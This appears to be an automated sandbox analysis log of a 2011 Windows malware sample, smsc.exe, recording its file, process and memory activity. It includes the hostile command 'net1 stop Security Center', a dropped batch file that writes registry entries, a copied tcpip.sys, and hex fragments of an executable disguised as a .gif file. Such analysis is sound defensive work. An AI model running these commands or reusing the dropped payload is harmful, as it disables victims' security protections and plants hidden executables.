Section loaded	Path: \KnownDlls\ole32.dll Access: write and read and execute Type: image Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid	success or wait	1601677541
Section loaded	Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: image Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid	success or wait	1601711485
Section loaded	Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid	success or wait	1601739622
Section loaded	Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: image Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid	success or wait	1601759864
Section loaded	Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: image Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid	success or wait	1601771203
Section loaded	Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: image Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid	success or wait	1601795034
Section loaded	Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: image Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid	success or wait	1601827305
Section loaded	Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid	success or wait	1601854316
Section loaded	Path: \NLS\NlsSectionCType Access: read Type: image Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid	success or wait	1601886748
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1602098076
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid	success or wait	1602107705
Section loaded	Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid	success or wait	1602118665
Section loaded	Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1020000 Size: 8462336 Protection: readonly Mapped to pid: own pid	success or wait	1602612804
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid	success or wait	1602661865
Section loaded	Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid	success or wait	1602669422
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid	success or wait	1602740773
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1602748789
Section loaded	Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	1602863035
Section loaded	Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: image Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid	success or wait	1603005907
Section loaded	Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid	success or wait	1603043334
Section loaded	Path: \BaseNamedObjects\ShimSharedMemory Access: write Type: image Baseaddress: 8B0000 Size: 57344 Protection: read write Mapped to pid: own pid	success or wait	1603187043
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: write and read and execute Type: commit Baseaddress: 8C0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1603198492
Section loaded	Path: C:\WINDOWS\system32\apphelp.dll Access: query and write and read and execute Type: image Baseaddress: 77B40000 Size: 139264 Protection: read write Mapped to pid: own pid	success or wait	1603215661
Section loaded	Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 8C0000 Size: 1208320 Protection: readonly Mapped to pid: own pid	success or wait	1603230704
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1603257439
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1603267925
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: write and read and execute Type: commit Baseaddress: 9F0000 Size: 126976 Protection: execute Mapped to pid: own pid	success or wait	1603278879
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 9F0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1603287597
Section loaded	Path: C:\WINDOWS\system32\net1.exe Access: query and read Type: commit Baseaddress: 8C0000 Size: 126976 Protection: readonly Mapped to pid: own pid	success or wait	1603405368
Process created	PID: 1528 Path: C:\WINDOWS\system32\net1.exe Cmdline: net1 stop Security Center Createflags: suspended	success or wait	1603420909

Analysis File: smsc.exe PID: 740 Parent PID: 668

Sections

General
Start time:	07:41:14
Start date:	21/09/2011
Path:	C:\WINDOWS\system32\smsc.exe
Commandline:	not known
Imagebase:	0x400000
File size:	50703 bytes
MD5 hash:	9C0930A84D40CF3E57600CCF15C82794

File Activities:

File opened
File Path	Access	Options	Content overwritten	Completion	Count	Source Address
C:\WINDOWS\Registration\R000000000007.clb	read attributes and synchronize and generic read	synchronous io non alert and non directory file	false	success or wait	1	40FF50
C:\WINDOWS\system32\msxml3r.dll	read attributes and synchronize and generic read	synchronous io non alert and non directory file	false	success or wait	2	40FF50
\Device\Afd\AsyncConnectHlp	synchronize and generic read and generic write	no options	true	success or wait	1	40FF50

File created
File Path	Access	Attributes	Options	Completion	Count	Source Address
c:\sdfeww.bat	read attributes and synchronize and generic write	none	synchronous io non alert and non directory file	success or wait	1	40B14A
C:\Documents and Settings\LocalService\IETldCache\	read data or list directory and synchronize	normal	directory file and synchronous io non alert and open for backup ident	success or wait	1	40FF50
C:\Documents and Settings\LocalService\IETldCache\index.dat	read attributes and synchronize and generic read and generic write	hidden and system and not contend indexed	synchronous io non alert and non directory file and random access	success or wait	16	40FF50
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	read attributes and synchronize and generic write	not contend indexed	synchronous io non alert and non directory file	success or wait	1	40FF50
C:\WINDOWS\TEMP\pac_00603.tmp	read attributes and synchronize and generic write	none	synchronous io non alert and non directory file	success or wait	1	40FF6F

File deleted
File Path	Completion	Count	Source Address
C:\binary.exe	cannot delete	1	40776E
C:\binary.exe	success or wait	1	40776E

File copied
Old File Path	New File Path	Completion	Count	Source Address
C:\WINDOWS\system32\drivers\tcpip.sys	C:\WINDOWS\system32\drivers\tcpip.sys.bck	success or wait	1	40FE53

File written
File Path	Offset	Length	Value	Completion	Count	Source Address
C:\sdfeww.bat	none	1350	40 65 63 68 6F 20 6F 66 66 0D 0A 45 63 68 6F 20 52 45 47 45 44 49 54 34 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 2E 3E 3E 25 74 65 6D 70 25 5C 37 36 38 34 64 2E 72 65 67 0D 0A 45 63 68 6F 20 20 5B 48 4B 45 59 5F 4C 4F 43 41 4C 5F 4D 41 43 48 49 4E 45 5C 53 59 53 54 45 4D	success or wait	1	40B171
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	00 00 00 EF 03 00 80 05 00 00 00 EF 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2E 64 61 74 61 00 00 00 A4 A4 00 00 80 F4 03 00 00 A5 00 00 80 F4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C8 50 41 47 45 00 00 00 00 2B 1F 00 00 80 99 04 00 80 1F 00 00 80 99 04 00 00 00 00 00 00 00	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	00 00 00 EF 03 00 80 05 00 00 00 EF 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2E 64 61 74 61 00 00 00 A4 A4 00 00 80 F4 03 00 00 A5 00 00 80 F4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C8 50 41 47 45 00 00 00 00 2B 1F 00 00 80 99 04 00 80 1F 00 00 80 99 04 00 00 00 00 00 00 00	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	E8 7C FF FF FF 8B C8 BA 28 43 05 00 87 0A 2B C1 85 C0 7E 0E B9 C8 00 00 00 3B C1 0F 8D 77 A2 02 00 C3 33 C0 EB FB 90 90 90 90 90 8B FF 55 8B EC 83 EC 60 56 33 F6 39 35 98 98 05 00 89 75 E8 89 75 CC 0F 85 7D EA 00 00 53 57 64 0F B6 05 51 00 00 00 3B C6 89 45 E4 0F 85 54 0F 00 00 FF 15 6C F0 04 00 8B	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	E8 7C FF FF FF 8B C8 BA 28 43 05 00 87 0A 2B C1 85 C0 7E 0E B9 C8 00 00 00 3B C1 0F 8D 77 A2 02 00 C3 33 C0 EB FB 90 90 90 90 90 8B FF 55 8B EC 83 EC 60 56 33 F6 39 35 98 98 05 00 89 75 E8 89 75 CC 0F 85 7D EA 00 00 53 57 64 0F B6 05 51 00 00 00 3B C6 89 45 E4 0F 85 54 0F 00 00 FF 15 6C F0 04 00 8B	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	45 C0 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 89 75 C4 FF D3 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF 15 BC F1 04 00 A1 88 96 05 00 8B 4D BC 03 F0 3B CE 0F 85 67 79 00 00 8B 45 C0 89 41 04 8B 45 C0 8B 4D BC 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF D3 8B 45 DC FF 45 F8 66 8B C8 66 81 E9 FE 01 40	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	45 C0 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 89 75 C4 FF D3 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF 15 BC F1 04 00 A1 88 96 05 00 8B 4D BC 03 F0 3B CE 0F 85 67 79 00 00 8B 45 C0 89 41 04 8B 45 C0 8B 4D BC 89 08 A1 88 96 05 00 8D 8C 07 FC 0F 00 00 FF D3 8B 45 DC FF 45 F8 66 8B C8 66 81 E9 FE 01 40	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	47 1E 8B 77 08 8B 5C 38 10 33 C9 3B F1 89 4D 0C 89 75 FC 74 49 F6 46 06 05 74 34 8B 46 0C 8B 4E 14 8B D1 8B 36 85 F6 75 30 8D 75 0C 56 FF 75 FC 2B CB 51 2B D3 52 8D 0C 18 51 53 50 57 FF 75 08 E8 24 00 00 00 8B 45 0C 5F 5E 5B C9 C2 08 00 51 56 FF 15 78 F1 04 00 EB C5 03 4E 14 EB C5 33 C0 33 D2 EB C5	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	47 1E 8B 77 08 8B 5C 38 10 33 C9 3B F1 89 4D 0C 89 75 FC 74 49 F6 46 06 05 74 34 8B 46 0C 8B 4E 14 8B D1 8B 36 85 F6 75 30 8D 75 0C 56 FF 75 FC 2B CB 51 2B D3 52 8D 0C 18 51 53 50 57 FF 75 08 E8 24 00 00 00 8B 45 0C 5F 5E 5B C9 C2 08 00 51 56 FF 15 78 F1 04 00 EB C5 03 4E 14 EB C5 33 C0 33 D2 EB C5	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	75 0F 80 7D 0C 00 74 09 46 3B 35 0C FC 04 00 72 BC A1 88 3E 05 00 8D 44 07 04 83 C9 FF F0 0F C1 08 5E 5B 5F C9 C2 08 00 66 81 FA 06 08 0F 85 90 00 00 00 8B 55 08 50 2B C8 51 03 C7 50 FF 75 14 8D 54 96 48 FF 75 10 FF 02 56 E8 B1 04 00 00 E9 C6 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 53 56 8B 75 08 83	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	75 0F 80 7D 0C 00 74 09 46 3B 35 0C FC 04 00 72 BC A1 88 3E 05 00 8D 44 07 04 83 C9 FF F0 0F C1 08 5E 5B 5F C9 C2 08 00 66 81 FA 06 08 0F 85 90 00 00 00 8B 55 08 50 2B C8 51 03 C7 50 FF 75 14 8D 54 96 48 FF 75 10 FF 02 56 E8 B1 04 00 00 E9 C6 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 53 56 8B 75 08 83	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	85 66 6A 02 00 8B 46 0C 39 B8 C8 00 00 00 0F 85 A7 05 00 00 8B 46 0C 39 B8 C4 00 00 00 0F 85 6C 6A 02 00 8B 46 0C 8D 88 C0 00 00 00 A1 10 14 05 00 39 01 0F 87 65 6A 02 00 8B 46 0C F6 80 B4 00 00 00 04 0F 85 5C 6A 02 00 8B 46 04 89 45 FC 8B 46 0C 8B 98 AC 00 00 00 8B 80 C0 00 00 00 83 EB 20 89 45 DC	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	85 66 6A 02 00 8B 46 0C 39 B8 C8 00 00 00 0F 85 A7 05 00 00 8B 46 0C 39 B8 C4 00 00 00 0F 85 6C 6A 02 00 8B 46 0C 8D 88 C0 00 00 00 A1 10 14 05 00 39 01 0F 87 65 6A 02 00 8B 46 0C F6 80 B4 00 00 00 04 0F 85 5C 6A 02 00 8B 46 04 89 45 FC 8B 46 0C 8B 98 AC 00 00 00 8B 80 C0 00 00 00 83 EB 20 89 45 DC	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	90 8B FF 55 8B EC 51 51 53 8B 5D 08 8B C3 69 C0 6D 4E C6 41 05 39 30 00 00 33 D2 6A 1F 59 F7 F1 8B C3 C1 E8 1D 6B C0 1F 03 D0 8D 14 95 60 37 05 00 8B 02 85 C0 89 55 F8 0F 84 22 13 00 00 8B CB C1 E1 03 33 C8 F7 C1 F8 FF FF FF 0F 85 0F 13 00 00 83 E0 07 8A 80 DC F2 04 00 5B C9 C2 04 00 90 90 90 90 90	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	90 8B FF 55 8B EC 51 51 53 8B 5D 08 8B C3 69 C0 6D 4E C6 41 05 39 30 00 00 33 D2 6A 1F 59 F7 F1 8B C3 C1 E8 1D 6B C0 1F 03 D0 8D 14 95 60 37 05 00 8B 02 85 C0 89 55 F8 0F 84 22 13 00 00 8B CB C1 E1 03 33 C8 F7 C1 F8 FF FF FF 0F 85 0F 13 00 00 83 E0 07 8A 80 DC F2 04 00 5B C9 C2 04 00 90 90 90 90 90	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	FF 36 88 45 1F E8 F5 FD FF FF 3C 08 0F 85 12 D4 01 00 8B 75 F8 FF 36 8B 7D 08 57 E8 42 FE FF FF 8B D8 85 DB 0F 84 9C 01 00 00 83 7B 20 00 0F 85 A2 D3 01 00 8B 4D DC FF 15 C0 F1 04 00 8A 45 1B 88 45 F4 85 DB 0F 84 91 00 00 00 8B 4B 04 33 D2 83 F9 FF 89 53 28 74 5F 8B 47 14 2B C2 0F 85 DA D3 01 00 39	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	FF 36 88 45 1F E8 F5 FD FF FF 3C 08 0F 85 12 D4 01 00 8B 75 F8 FF 36 8B 7D 08 57 E8 42 FE FF FF 8B D8 85 DB 0F 84 9C 01 00 00 83 7B 20 00 0F 85 A2 D3 01 00 8B 4D DC FF 15 C0 F1 04 00 8A 45 1B 88 45 F4 85 DB 0F 84 91 00 00 00 8B 4B 04 33 D2 83 F9 FF 89 53 28 74 5F 8B 47 14 2B C2 0F 85 DA D3 01 00 39	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	E9 A7 FC FF FF B8 01 00 01 00 E9 E7 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 83 EC 34 53 56 57 E8 5A F1 FF FF 8B 7D 0C 33 DB 8D 4F 1C 89 45 EC 89 5D F8 FF 15 0C EF 04 00 8D B7 58 01 00 00 88 45 0F 8B 06 3B C3 0F 85 8E CD 01 00 8D 47 28 89 5D D4 8B 48 04 3B CB 0F 85 AD 1E 01 00 8B 00 33 DB 3B C3 75 ED	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	E9 A7 FC FF FF B8 01 00 01 00 E9 E7 FE FF FF 90 90 90 90 90 8B FF 55 8B EC 83 EC 34 53 56 57 E8 5A F1 FF FF 8B 7D 0C 33 DB 8D 4F 1C 89 45 EC 89 5D F8 FF 15 0C EF 04 00 8D B7 58 01 00 00 88 45 0F 8B 06 3B C3 0F 85 8E CD 01 00 8D 47 28 89 5D D4 8B 48 04 3B CB 0F 85 AD 1E 01 00 8B 00 33 DB 3B C3 75 ED	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	FF 33 D2 B9 E8 03 00 00 F7 F1 33 DB 89 5D E0 89 45 D0 E8 90 00 00 00 33 C9 B8 44 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 0F 84 1E 8D 00 00 39 1D 48 3B 05 00 0F 85 7F 9C 01 00 33 C9 B8 40 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 8B 3D A8 F1 04 00 0F 84 5D	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	FF 33 D2 B9 E8 03 00 00 F7 F1 33 DB 89 5D E0 89 45 D0 E8 90 00 00 00 33 C9 B8 44 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 0F 84 1E 8D 00 00 39 1D 48 3B 05 00 0F 85 7F 9C 01 00 33 C9 B8 40 3B 05 00 41 F0 0F C1 08 41 69 C9 88 13 00 00 81 F9 60 EA 00 00 8B 3D A8 F1 04 00 0F 84 5D	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	0F 84 CD 39 00 00 0F B7 41 1E 8B 44 08 3C 3B C7 89 45 E4 0F 84 A9 E5 01 00 0F B7 48 1E 0F B7 4C 01 20 3B CF 74 07 F6 C1 20 74 02 B2 01 8B 40 18 C1 E8 08 24 01 84 D2 88 45 FF 0F 84 7E 39 00 00 66 8B 46 02 8A E8 8A CC 0F B7 C1 8A 0E 80 E1 F0 80 F9 40 0F 85 9C 39 00 00 3B C3 0F 82 94 39 00 00 3B 45 14	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	0F 84 CD 39 00 00 0F B7 41 1E 8B 44 08 3C 3B C7 89 45 E4 0F 84 A9 E5 01 00 0F B7 48 1E 0F B7 4C 01 20 3B CF 74 07 F6 C1 20 74 02 B2 01 8B 40 18 C1 E8 08 24 01 84 D2 88 45 FF 0F 84 7E 39 00 00 66 8B 46 02 8A E8 8A CC 0F B7 C1 8A 0E 80 E1 F0 80 F9 40 0F 85 9C 39 00 00 3B C3 0F 82 94 39 00 00 3B 45 14	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	14 0F 84 DB 37 00 00 FF 75 18 50 56 53 FF 75 F4 FF 75 F8 FF 75 EC FF 75 08 E8 E3 00 00 00 8B 5D CC 85 DB 0F 85 F5 E1 00 00 5F 5E 5B C9 C2 2C 00 90 90 90 90 90 8B FF 55 8B EC 6A 02 58 B9 00 14 05 00 F0 0F C1 01 8B 55 08 83 E0 01 8B C8 C1 E1 04 81 C1 E0 13 05 00 89 0A 5D C2 04 00 90 90 90 90 90 8B FF	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	14 0F 84 DB 37 00 00 FF 75 18 50 56 53 FF 75 F4 FF 75 F8 FF 75 EC FF 75 08 E8 E3 00 00 00 8B 5D CC 85 DB 0F 85 F5 E1 00 00 5F 5E 5B C9 C2 2C 00 90 90 90 90 90 8B FF 55 8B EC 6A 02 58 B9 00 14 05 00 F0 0F C1 01 8B 55 08 83 E0 01 8B C8 C1 E1 04 81 C1 E0 13 05 00 89 0A 5D C2 04 00 90 90 90 90 90 8B FF	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	1C E8 DF FE FF FF 8B 45 FC F6 45 F8 80 0F 85 CF DD 01 00 80 3D 2C 3D 05 00 00 8B 55 2C 0F 85 CB DD 01 00 8B 45 2C 89 45 C4 8D 45 F0 50 C7 45 BC 01 00 00 00 89 7D C0 E8 F7 FD FF FF 89 45 EC 8B 45 F0 8B 08 3B C8 89 4D 08 74 47 8D 45 F4 50 6A 14 8D 45 BC 50 8D 45 1B 50 8D 45 D0 50 8B 47 0C 89 75 F4 FF	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	1C E8 DF FE FF FF 8B 45 FC F6 45 F8 80 0F 85 CF DD 01 00 80 3D 2C 3D 05 00 00 8B 55 2C 0F 85 CB DD 01 00 8B 45 2C 89 45 C4 8D 45 F0 50 C7 45 BC 01 00 00 00 89 7D C0 E8 F7 FD FF FF 89 45 EC 8B 45 F0 8B 08 3B C8 89 4D 08 74 47 8D 45 F4 50 6A 14 8D 45 BC 50 8D 45 1B 50 8D 45 D0 50 8B 47 0C 89 75 F4 FF	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	E7 01 00 8B 45 0C 8B 08 66 8B 41 14 C1 EF 04 A8 01 8B 3C BD C0 F4 04 00 0F 84 4E 06 00 00 8B 49 0C 8B 89 A8 00 00 00 8B F7 F7 D6 23 CE 8B F7 23 F3 0B CE 3B D9 0F 85 31 06 00 00 B0 0B 5F E9 09 F9 FF FF F6 45 14 01 0F 85 78 FA FF FF FF 05 90 F7 04 00 E9 CD FB FF FF 8A CB 80 E1 F0 80 F9 E0 0F 84 5F 3B	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	E7 01 00 8B 45 0C 8B 08 66 8B 41 14 C1 EF 04 A8 01 8B 3C BD C0 F4 04 00 0F 84 4E 06 00 00 8B 49 0C 8B 89 A8 00 00 00 8B F7 F7 D6 23 CE 8B F7 23 F3 0B CE 3B D9 0F 85 31 06 00 00 B0 0B 5F E9 09 F9 FF FF F6 45 14 01 0F 85 78 FA FF FF FF 05 90 F7 04 00 E9 CD FB FF FF 8A CB 80 E1 F0 80 F9 E0 0F 84 5F 3B	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	A1 DC 13 05 00 85 C0 74 2A 83 65 F0 00 83 65 E4 00 83 65 E8 00 80 3D 2C 3D 05 00 00 8B 57 1C C7 45 08 20 00 00 00 89 55 10 75 08 85 C9 0F 84 2C D1 01 00 80 7E 09 06 75 44 8B 43 0C 83 B8 8C 00 00 00 07 0F 85 A5 9E 01 00 83 7F 10 00 74 1D 64 0F B6 05 51 00 00 00 8B 4B 0C 8B 89 80 01 00 00 3B C8 0F 85	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	A1 DC 13 05 00 85 C0 74 2A 83 65 F0 00 83 65 E4 00 83 65 E8 00 80 3D 2C 3D 05 00 00 8B 57 1C C7 45 08 20 00 00 00 89 55 10 75 08 85 C9 0F 84 2C D1 01 00 80 7E 09 06 75 44 8B 43 0C 83 B8 8C 00 00 00 07 0F 85 A5 9E 01 00 83 7F 10 00 74 1D 64 0F B6 05 51 00 00 00 8B 4B 0C 8B 89 80 01 00 00 3B C8 0F 85	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	75 0C FF 77 1C E8 28 00 00 00 85 C0 0F 84 1C 0B 00 00 8B F7 85 F6 0F 84 7F 5A 02 00 85 DB 0F 85 D6 3D 00 00 8B C6 5B 5E 5F 5D C2 10 00 90 90 90 90 90 8B FF 55 8B EC 8B 45 08 8B 80 A4 00 00 00 85 C0 74 19 F6 40 14 01 0F 84 34 09 00 00 8B 48 04 3B 4D 0C 0F 85 28 09 00 00 33 C0 40 5D C2 08 00 66 03 06	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	75 0C FF 77 1C E8 28 00 00 00 85 C0 0F 84 1C 0B 00 00 8B F7 85 F6 0F 84 7F 5A 02 00 85 DB 0F 85 D6 3D 00 00 8B C6 5B 5E 5F 5D C2 10 00 90 90 90 90 90 8B FF 55 8B EC 8B 45 08 8B 80 A4 00 00 00 85 C0 74 19 F6 40 14 01 0F 84 34 09 00 00 8B 48 04 3B 4D 0C 0F 85 28 09 00 00 33 C0 40 5D C2 08 00 66 03 06	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	FC 83 7D FC 01 0F 84 6E DD 01 00 C9 C2 04 00 3B 75 FC 74 0C 8B 4D F8 3B 4E 0C 0F 84 B5 E0 01 00 8B 36 E9 AF F9 FF FF 8B 47 0C 8A 80 36 01 00 00 84 C0 0F 84 61 F4 FF FF E9 89 D9 01 00 FF 05 90 F7 04 00 A8 01 0F 85 38 01 00 00 E9 E5 EA 01 00 05 E8 03 00 00 C7 45 CC 01 00 00 00 A3 E0 95 05 00 E9 95 E4	success or wait	1	40FFC7
C:\WINDOWS\Temp\pac_00603.tmp	none	514	FC 83 7D FC 01 0F 84 6E DD 01 00 C9 C2 04 00 3B 75 FC 74 0C 8B 4D F8 3B 4E 0C 0F 84 B5 E0 01 00 8B 36 E9 AF F9 FF FF 8B 47 0C 8A 80 36 01 00 00 84 C0 0F 84 61 F4 FF FF E9 89 D9 01 00 FF 05 90 F7 04 00 A8 01 0F 85 38 01 00 00 E9 E5 EA 01 00 05 E8 03 00 00 C7 45 CC 01 00 00 00 A3 E0 95 05 00 E9 95 E4	success or wait	1	40FFDF
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\4V74E6Q7\logo[1].gif	none	514	14 08 74 62 8B 45 F0 39 47 0C 75 5A 57 FF 75 28 FF 75 14 FF 75 10 E8 57 00 00 00 84 C0 0F 84 E6 7D 01 00 FF 75 2C 8B 46 0C FF 75 28 89 45 20 8B 5E 08 33 C0 40 50 FF 75 24 89 45 F8 8B 45 0C 56 FF 75 1C FF 75 18 FF 70 04 FF 77 04 FF 75 14 FF 75 10 57 FF 55 08 85 C0 75 03 21 45 F4 8B 45 20 89 5E 08 89	success or wait	1	40FFC7
